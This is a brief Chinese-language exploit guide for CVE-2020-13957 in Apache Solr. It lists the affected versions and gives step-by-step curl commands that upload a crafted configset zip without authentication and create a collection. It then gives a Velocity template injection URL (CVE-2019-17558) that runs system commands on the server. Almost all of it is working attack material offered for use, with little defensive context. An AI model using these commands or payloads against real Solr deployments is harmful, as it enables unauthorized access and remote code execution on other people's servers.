CVE-2020-13957 Apache Solr 未授权上传

# CVE-2020-13957 Apache Solr 未授权上传


影响版本:

– Apache Solr 6.6.0 -6.6.5
– Apache Solr 7.0.0 -7.7.3
– Apache Solr 8.0.0 -8.6.2

利用条件：

“`
不同版本需要的zip文件不同，需要提前准备好对应版本的恶意zip文件。（Solr7.7.0为例）
1、进入/solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf 目录
2、zip -r – * > mytest.zip
“`

利用方法：

“`
1、执行
curl -X POST –header “Content-Type:application/octet-stream” –data-binary @mytest.zip “http://ip:8983/solr/admin/configs?action=UPLOAD&name=mytest”

2、执行
curl “http://ip:8983/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest”

3、此时可以看到已经上传上去名为mytest2的Collection。现在就可以使用CVE-2019-17558漏洞执行RCE。
http://ip:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
“`